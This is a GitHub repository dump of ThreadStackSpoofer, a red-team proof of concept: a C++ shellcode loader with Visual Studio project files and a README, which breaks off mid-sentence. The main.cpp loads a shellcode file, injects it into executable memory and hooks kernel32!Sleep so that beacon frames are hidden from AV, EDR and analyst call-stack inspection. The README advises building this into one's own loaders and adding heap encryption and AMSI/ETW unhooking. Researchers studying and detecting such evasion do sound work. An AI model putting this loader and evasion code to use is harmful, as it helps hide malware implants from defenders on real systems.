├── images ├── frame0.png ├── spoofed2.png ├── not-spoofed.png └── legit-call-stack.png ├── ThreadStackSpoofer ├── ThreadStackSpoofer.vcxproj.user ├── ThreadStackSpoofer.vcxproj.filters ├── header.h ├── ThreadStackSpoofer.vcxproj └── main.cpp ├── LICENSE.txt ├── ThreadStackSpoofer.sln ├── CODE_OF_CONDUCT.md └── README.md /images/frame0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/frame0.png -------------------------------------------------------------------------------- /images/spoofed2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/spoofed2.png -------------------------------------------------------------------------------- /images/not-spoofed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/not-spoofed.png -------------------------------------------------------------------------------- /images/legit-call-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/legit-call-stack.png -------------------------------------------------------------------------------- /ThreadStackSpoofer/ThreadStackSpoofer.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | d:\dev2\ThreadStackSpoofer\tests\beacon64.bin 1 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Mariusz Banach (mgeeky, ) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/ThreadStackSpoofer.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /ThreadStackSpoofer.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31105.61 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ThreadStackSpoofer", "ThreadStackSpoofer\ThreadStackSpoofer.vcxproj", "{9EED9E19-9475-4D2E-9B06-37D6799417FE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.ActiveCfg = Debug|x64 17 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.Build.0 = Debug|x64 18 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.ActiveCfg = Debug|Win32 19 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.Build.0 = Debug|Win32 20 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.ActiveCfg = Release|x64 21 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.Build.0 = Release|x64 22 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.ActiveCfg = Release|Win32 23 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {C5AF3E09-A902-42DF-9A8C-D63A66F8F25B} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/header.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | typedef void (WINAPI* typeSleep)( 10 | DWORD dwMilis 11 | ); 12 | 13 | typedef DWORD(NTAPI* typeNtFlushInstructionCache)( 14 | HANDLE ProcessHandle, 15 | PVOID BaseAddress, 16 | ULONG NumberOfBytesToFlush 17 | ); 18 | 19 | typedef std::unique_ptr::type, decltype(&::CloseHandle)> HandlePtr; 20 | 21 | struct HookedSleep 22 | { 23 | typeSleep origSleep; 24 | BYTE sleepStub[16]; 25 | }; 26 | 27 | struct HookTrampolineBuffers 28 | { 29 | // (Input) Buffer containing bytes that should be restored while unhooking. 30 | BYTE* originalBytes; 31 | DWORD originalBytesSize; 32 | 33 | // (Output) Buffer that will receive bytes present prior to trampoline installation/restoring. 34 | BYTE* previousBytes; 35 | DWORD previousBytesSize; 36 | }; 37 | 38 | template 39 | void log(Args... args) 40 | { 41 | std::stringstream oss; 42 | (oss << ... << args); 43 | 44 | std::cout << oss.str() << std::endl; 45 | } 46 | 47 | static const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ; 48 | 49 | bool hookSleep(); 50 | void runShellcode(LPVOID param); 51 | bool injectShellcode(std::vector& shellcode, HandlePtr& thread); 52 | bool readShellcode(const char* path, std::vector& shellcode); 53 | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL); 54 | void WINAPI MySleep(DWORD _dwMilliseconds); -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | Mariusz Banach (mgeeky, @mariuszbit, mb@binary-offensive.com). 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/ThreadStackSpoofer.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {9eed9e19-9475-4d2e-9b06-37d6799417fe} 25 | ThreadStackSpoofer 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | stdcpp17 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | Level3 101 | true 102 | true 103 | true 104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | stdcpp17 107 | 108 | 109 | Console 110 | true 111 | true 112 | true 113 | 114 | 115 | 116 | 117 | Level3 118 | false 119 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | stdcpp17 122 | false 123 | false 124 | 125 | 126 | Console 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | true 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | true 138 | stdcpp17 139 | 140 | 141 | Console 142 | true 143 | true 144 | true 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/main.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "header.h" 3 | #include 4 | 5 | HookedSleep g_hookedSleep; 6 | 7 | 8 | void WINAPI MySleep(DWORD dwMilliseconds) 9 | { 10 | // 11 | // Locate this stack frame's return address. 12 | // 13 | auto overwrite = (PULONG_PTR)_AddressOfReturnAddress(); 14 | const auto origReturnAddress = *overwrite; 15 | 16 | log("[>] Original return address: 0x", 17 | std::hex, std::setw(8), std::setfill('0'), origReturnAddress, 18 | ". Finishing call stack..."); 19 | 20 | // 21 | // By overwriting the return address with 0 we're basically telling call stack unwinding algorithm 22 | // to stop unwinding call stack any further, as there further frames. This we can hide our remaining stack frames 23 | // referencing shellcode memory allocation from residing on a call stack. 24 | // 25 | *overwrite = 0; 26 | 27 | log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n"); 28 | 29 | // 30 | // Perform sleep emulating originally hooked functionality. 31 | // 32 | ::SleepEx(dwMilliseconds, false); 33 | 34 | // 35 | // Restore original thread's call stack. 36 | // 37 | log("[<] Restoring original return address..."); 38 | *overwrite = origReturnAddress; 39 | } 40 | 41 | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/) 42 | { 43 | #ifdef _WIN64 44 | uint8_t trampoline[] = { 45 | 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, addr 46 | 0x41, 0xFF, 0xE2 // jmp r10 47 | }; 48 | 49 | uint64_t addr = (uint64_t)(jumpAddress); 50 | memcpy(&trampoline[2], &addr, sizeof(addr)); 51 | #else 52 | uint8_t trampoline[] = { 53 | 0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, addr 54 | 0xFF, 0xE0 // jmp eax 55 | }; 56 | 57 | uint32_t addr = (uint32_t)(jumpAddress); 58 | memcpy(&trampoline[1], &addr, sizeof(addr)); 59 | #endif 60 | 61 | DWORD dwSize = sizeof(trampoline); 62 | DWORD oldProt = 0; 63 | bool output = false; 64 | 65 | if (installHook) 66 | { 67 | if (buffers != NULL) 68 | { 69 | if (buffers->previousBytes == nullptr || buffers->previousBytesSize == 0) 70 | return false; 71 | 72 | memcpy(buffers->previousBytes, addressToHook, buffers->previousBytesSize); 73 | } 74 | 75 | if (::VirtualProtect( 76 | addressToHook, 77 | dwSize, 78 | PAGE_EXECUTE_READWRITE, 79 | &oldProt 80 | )) 81 | { 82 | memcpy(addressToHook, trampoline, dwSize); 83 | output = true; 84 | } 85 | } 86 | else 87 | { 88 | if (buffers == NULL) 89 | return false; 90 | 91 | if (buffers->originalBytes == nullptr || buffers->originalBytesSize == 0) 92 | return false; 93 | 94 | dwSize = buffers->originalBytesSize; 95 | 96 | if (::VirtualProtect( 97 | addressToHook, 98 | dwSize, 99 | PAGE_EXECUTE_READWRITE, 100 | &oldProt 101 | )) 102 | { 103 | memcpy(addressToHook, buffers->originalBytes, dwSize); 104 | output = true; 105 | } 106 | } 107 | 108 | static typeNtFlushInstructionCache pNtFlushInstructionCache = NULL; 109 | if (!pNtFlushInstructionCache) 110 | pNtFlushInstructionCache = (typeNtFlushInstructionCache) 111 | GetProcAddress(GetModuleHandleA("ntdll"), "NtFlushInstructionCache"); 112 | 113 | // 114 | // We're flushing instructions cache just in case our hook didn't kick in immediately. 115 | // 116 | if (pNtFlushInstructionCache) 117 | pNtFlushInstructionCache(GetCurrentProcess(), addressToHook, dwSize); 118 | 119 | ::VirtualProtect( 120 | addressToHook, 121 | dwSize, 122 | oldProt, 123 | &oldProt 124 | ); 125 | 126 | return output; 127 | } 128 | 129 | bool hookSleep() 130 | { 131 | HookTrampolineBuffers buffers = { 0 }; 132 | buffers.previousBytes = g_hookedSleep.sleepStub; 133 | buffers.previousBytesSize = sizeof(g_hookedSleep.sleepStub); 134 | 135 | g_hookedSleep.origSleep = reinterpret_cast(Sleep); 136 | 137 | if (!fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep, &buffers)) 138 | return false; 139 | 140 | return true; 141 | } 142 | 143 | bool readShellcode(const char* path, std::vector& shellcode) 144 | { 145 | HandlePtr file(CreateFileA( 146 | path, 147 | GENERIC_READ, 148 | FILE_SHARE_READ, 149 | NULL, 150 | OPEN_EXISTING, 151 | 0, 152 | NULL 153 | ), &::CloseHandle); 154 | 155 | if (INVALID_HANDLE_VALUE == file.get()) 156 | return false; 157 | 158 | DWORD highSize; 159 | DWORD readBytes = 0; 160 | DWORD lowSize = GetFileSize(file.get(), &highSize); 161 | 162 | shellcode.resize(lowSize, 0); 163 | 164 | return ReadFile(file.get(), shellcode.data(), lowSize, &readBytes, NULL); 165 | } 166 | 167 | void runShellcode(LPVOID param) 168 | { 169 | auto func = ((void(*)())param); 170 | 171 | // 172 | // Jumping to shellcode. Look at the coment in injectShellcode() describing why we opted to jump 173 | // into shellcode in a classical manner instead of fancy hooking 174 | // ntdll!RtlUserThreadStart+0x21 like in ThreadStackSpoofer example. 175 | // 176 | func(); 177 | } 178 | 179 | bool injectShellcode(std::vector& shellcode, HandlePtr& thread) 180 | { 181 | // 182 | // Firstly we allocate RW page to avoid RWX-based IOC detections 183 | // 184 | auto alloc = ::VirtualAlloc( 185 | NULL, 186 | shellcode.size() + 1, 187 | MEM_COMMIT, 188 | PAGE_READWRITE 189 | ); 190 | 191 | if (!alloc) 192 | return false; 193 | 194 | memcpy(alloc, shellcode.data(), shellcode.size()); 195 | 196 | DWORD old; 197 | 198 | // 199 | // Then we change that protection to RX 200 | // 201 | if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old)) 202 | return false; 203 | 204 | shellcode.clear(); 205 | 206 | // 207 | // Example provided in previous release of ThreadStackSpoofer: 208 | // https://github.com/mgeeky/ThreadStackSpoofer/blob/ec0237c5f8b1acd052d57562a43f40a20752b5ca/ThreadStackSpoofer/main.cpp#L417 209 | // showed how we can start our shellcode from temporarily hooked ntdll!RtlUserThreadStart+0x21 . 210 | // 211 | // That approached was a bit flawed due to the fact, the as soon as we introduce a hook within module, 212 | // even when we immediately unhook it the system allocates a page of memory (4096 bytes) of type MEM_PRIVATE 213 | // inside of a shared library allocation that comprises of MEM_IMAGE/MEM_MAPPED pool. 214 | // 215 | // Memory scanners such as Moneta are sensitive to scanning memory mapped PE DLLs and finding amount of memory 216 | // labeled as MEM_PRIVATE within their region, considering this (correctly!) as a "Modified Code" anomaly. 217 | // 218 | // We're unable to evade this detection for kernel32!Sleep however we can when it comes to ntdll. Instead of 219 | // running our shellcode from a legitimate user thread callback, we can simply run a thread pointing to our 220 | // method and we'll instead jump to the shellcode from that method. 221 | // 222 | // After discussion I had with @waldoirc we came to the conclusion that in order not to bring new IOCs it is better 223 | // to start shellcode from within EXE's own code space, thus avoiding detections based on `ntdll!RtlUserThreadStart+0x21` 224 | // being an outstanding anomaly in some environments. Shout out to @waldoirc for our really long discussion! 225 | // 226 | thread.reset(::CreateThread( 227 | NULL, 228 | 0, 229 | (LPTHREAD_START_ROUTINE)runShellcode, 230 | alloc, 231 | 0, 232 | 0 233 | )); 234 | 235 | return (NULL != thread.get()); 236 | } 237 | 238 | int main(int argc, char** argv) 239 | { 240 | if (argc < 3) 241 | { 242 | log("Usage: ThreadStackSpoofer.exe "); 243 | return 1; 244 | } 245 | 246 | std::vector shellcode; 247 | bool spoof = (!strcmp(argv[2], "true") || !strcmp(argv[2], "1")); 248 | 249 | log("[.] Reading shellcode bytes..."); 250 | if (!readShellcode(argv[1], shellcode)) 251 | { 252 | log("[!] Could not open shellcode file! Error: ", ::GetLastError()); 253 | return 1; 254 | } 255 | 256 | if (spoof) 257 | { 258 | log("[.] Hooking kernel32!Sleep..."); 259 | if (!hookSleep()) 260 | { 261 | log("[!] Could not hook kernel32!Sleep!"); 262 | return 1; 263 | } 264 | } 265 | else 266 | { 267 | log("[.] Thread call stack will NOT be spoofed."); 268 | } 269 | 270 | log("[.] Injecting shellcode..."); 271 | 272 | HandlePtr thread(NULL, &::CloseHandle); 273 | if (!injectShellcode(shellcode, thread)) 274 | { 275 | log("[!] Could not inject shellcode! Error: ", ::GetLastError()); 276 | return 1; 277 | } 278 | 279 | log("[+] Shellcode is now running."); 280 | 281 | WaitForSingleObject(thread.get(), INFINITE); 282 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Thread Stack Spoofing / Call Stack Spoofing PoC 2 | 3 | A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. 4 | 5 | ## Intro 6 | 7 | This is an example implementation for _Thread Stack Spoofing_ technique aiming to evade Malware Analysts, AVs and EDRs looking for references to shellcode's frames in an examined thread's call stack. 8 | The idea is to hide references to the shellcode on thread's call stack thus masquerading allocations containing malware's code. 9 | 10 | Implementation along with my [ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation) brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪 11 | 12 | 13 | ### Implementation has changed 14 | 15 | Current implementation differs heavily to what was originally published. 16 | This is because I realised there is a way simpler approach to terminate thread's call stack processal and hide shellcode's related frames by simply writing `0` to the return address of the first frame we control: 17 | 18 | ``` 19 | void WINAPI MySleep(DWORD _dwMilliseconds) 20 | { 21 | [...] 22 | auto overwrite = (PULONG_PTR)_AddressOfReturnAddress(); 23 | const auto origReturnAddress = *overwrite; 24 | *overwrite = 0; 25 | 26 | [...] 27 | *overwrite = origReturnAddress; 28 | } 29 | ``` 30 | 31 | The previous implementation, utilising `StackWalk64` can be accessed in this [commit c250724](https://github.com/mgeeky/ThreadStackSpoofer/tree/c2507248723d167fb2feddf50d35435a17fd61a2). 32 | 33 | This implementation is much more stable and works nicely on both `Debug` and `Release` under two architectures - `x64` and `x86`. 34 | 35 | 36 | ## Demo 37 | 38 | This is how a call stack may look like when it is **NOT** spoofed: 39 | 40 | ![not-spoofed](images/not-spoofed.png) 41 | 42 | This in turn, when thread stack spoofing is enabled: 43 | 44 | ![spoofed](images/spoofed2.png) 45 | 46 | Above we can see that the last frame on our call stack is our `MySleep` callback. 47 | One can wonder does it immediately brings opportunities new IOCs? Hunting rules can look for threads having call stacks not unwinding into following expected thread entry points located within system libraries: 48 | 49 | ``` 50 | kernel32!BaseThreadInitThunk+0x14 51 | ntdll!RtlUserThreadStart+0x21 52 | ``` 53 | 54 | However the call stack of the spoofed thread may look rather odd at first, a brief examination of my system shown, that there are other threads not unwinding to the above entry points as well: 55 | 56 | ![legit call stack](images/legit-call-stack.png) 57 | 58 | The above screenshot shows a thread of unmodified **Total Commander x64**. As we can see, its call stack pretty much resembles our own in terms of initial call stack frames. 59 | 60 | Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic? 61 | 62 | 63 | ## How it works? 64 | 65 | The rough algorithm is following: 66 | 67 | 1. Read shellcode's contents from file. 68 | 2. Acquire all the necessary function pointers from `dbghelp.dll`, call `SymInitialize` 69 | 3. Hook `kernel32!Sleep` pointing back to our callback. 70 | 4. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. The thread should start from our `runShellcode` function to avoid having Thread's _StartAddress_ point into somewhere unexpected and anomalous (such as `ntdll!RtlUserThreadStart+0x21`) 71 | 5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked. 72 | 6. We then overwrite last return address on the stack to `0` which effectively should finish the call stack. 73 | 7. Finally a call to `::SleepEx` is made to let the Beacon's sleep while waiting for further communication. 74 | 8. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed. 75 | 76 | Function return addresses are scattered all around the thread's stack memory area, pointed to by `RBP/EBP` register. 77 | In order to find them on the stack, we need to firstly collect frame pointers, then dereference them for overwriting: 78 | 79 | ![stack frame](images/frame0.png) 80 | 81 | _(the above image was borrowed from **Eli Bendersky's** post named [Stack frame layout on x86-64](https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64/))_ 82 | 83 | ``` 84 | *(PULONG_PTR)(frameAddr + sizeof(void*)) = Fake_Return_Address; 85 | ``` 86 | 87 | Initial implementation of `ThreadStackSpoofer` did that in `walkCallStack` and `spoofCallStack` functions, however the current implementation shows that these efforts _are not required to maintain stealthy call stack_. 88 | 89 | 90 | ## Example run 91 | 92 | Use case: 93 | 94 | ``` 95 | C:\> ThreadStackSpoofer.exe 96 | ``` 97 | 98 | Where: 99 | - `` is a path to the shellcode file 100 | - `` when `1` or `true` will enable thread stack spoofing and anything else disables it. 101 | 102 | 103 | Example run that spoofs beacon's thread call stack: 104 | 105 | ``` 106 | PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1 107 | [.] Reading shellcode bytes... 108 | [.] Hooking kernel32!Sleep... 109 | [.] Injecting shellcode... 110 | [+] Shellcode is now running. 111 | [>] Original return address: 0x1926747bd51. Finishing call stack... 112 | 113 | ===> MySleep(5000) 114 | 115 | [<] Restoring original return address... 116 | [>] Original return address: 0x1926747bd51. Finishing call stack... 117 | 118 | ===> MySleep(5000) 119 | 120 | [<] Restoring original return address... 121 | [>] Original return address: 0x1926747bd51. Finishing call stack... 122 | ``` 123 | 124 | --- 125 | 126 | ## How do I use it? 127 | 128 | Look at the code and its implementation, understand the concept and re-implement the concept within your own Shellcode Loaders that you utilise to deliver your Red Team engagements. 129 | This is an yet another technique for advanced in-memory evasion that increases your Teams' chances for not getting caught by Anti-Viruses, EDRs and Malware Analysts taking look at your implants. 130 | 131 | While developing your advanced shellcode loader, you might also want to implement: 132 | 133 | - **Process Heap Encryption** - take an inspiration from this blog post: [Hook Heaps and Live Free](https://www.arashparsa.com/hook-heaps-and-live-free/) - which can let you evade Beacon configuration extractors like [`BeaconEye`](https://github.com/CCob/BeaconEye) 134 | - **Change your Beacon's memory pages protection to `RW` (from `RX/RWX`) and encrypt their contents** - using [Shellcode Fluctuation](https://github.com/mgeeky/ShellcodeFluctuation) technique - right before sleeping (that could evade scanners such as [`Moneta`](https://github.com/forrest-orr/moneta) or [`pe-sieve`](https://github.com/hasherezade/pe-sieve)) 135 | - **Clear out any leftovers from Reflective Loader** to avoid in-memory signatured detections 136 | - **Unhook everything you might have hooked** (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards. 137 | 138 | 139 | --- 140 | 141 | ## Actually this is not (yet) a true stack spoofing 142 | 143 | As it's been pointed out to me, the technique here is not _yet_ truly holding up to its name for being a _stack spoofer_. Since we're merely overwriting return addresses on the thread's stack, we're not spoofing the remaining areas of the stack itself. Moreover we're leaving our call stack _unwindable_ meaking it look anomalous since the system will not be able to properly walk the entire call stack frames chain. 144 | 145 | However I'm aware of these shortcomings, at the moment I've left it as is since I cared mostly about evading automated scanners that could iterate over processes, enumerate their threads, walk those threads stacks and pick up on any return address pointing back to a non-image memory (such as `SEC_PRIVATE` - the one allocated dynamically by `VirtuaAlloc` and friends). A focused malware analyst would immediately spot the oddity and consider the thread rather unusual, hunting down our implant. More than sure about it. Yet, I don't believe that nowadays automated scanners such as AV/EDR have sorts of heuristics implemented that would _actually walk each thread's stack_ to verify whether its un-windable `¯\_(ツ)_/¯` . 146 | 147 | Surely this project (and commercial implementation found in C2 frameworks) gives AV & EDR vendors arguments to consider implementing appropriate heuristics covering such a novel evasion technique. 148 | 149 | In order to improve this technique, one can aim for a true _Thread Stack Spoofer_ by inserting carefully crafted fake stack frames established in an reverse-unwinding process. 150 | Read more on this idea below. 151 | 152 | 153 | ### Implementing a true Thread Stack Spoofer 154 | 155 | Hours-long conversation with [namazso](https://twitter.com/namazso) teached me, that in order to aim for a proper thread stack spoofer we would need to reverse x64 call stack unwinding process. 156 | Firstly, one needs to carefully acknowledge the stack unwinding process explained in (a) linked below. The system when traverses Thread call stack on x64 architecture will not simply rely on return addresses scattered around the thread's stack, but rather it: 157 | 158 | 1. takes return address 159 | 2. attempts to identify function containing that address (with [RtlLookupFunctionEntry](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-rtllookupfunctionentry)) 160 | 3. That function returns `RUNTIME_FUNCTION`, `UNWIND_INFO` and `UNWIND_CODE` structures. These structures describe where are the function's beginning address, ending address, and where are all the code sequences that modify `RBP` or `RSP`. 161 | 4. System needs to know about all stack & frame pointers modifications that happened in each function across the Call Stack to then virtually _rollback_ these changes and virtually restore call stack pointers when a call to the processed call stack frame happened (this is implemented in 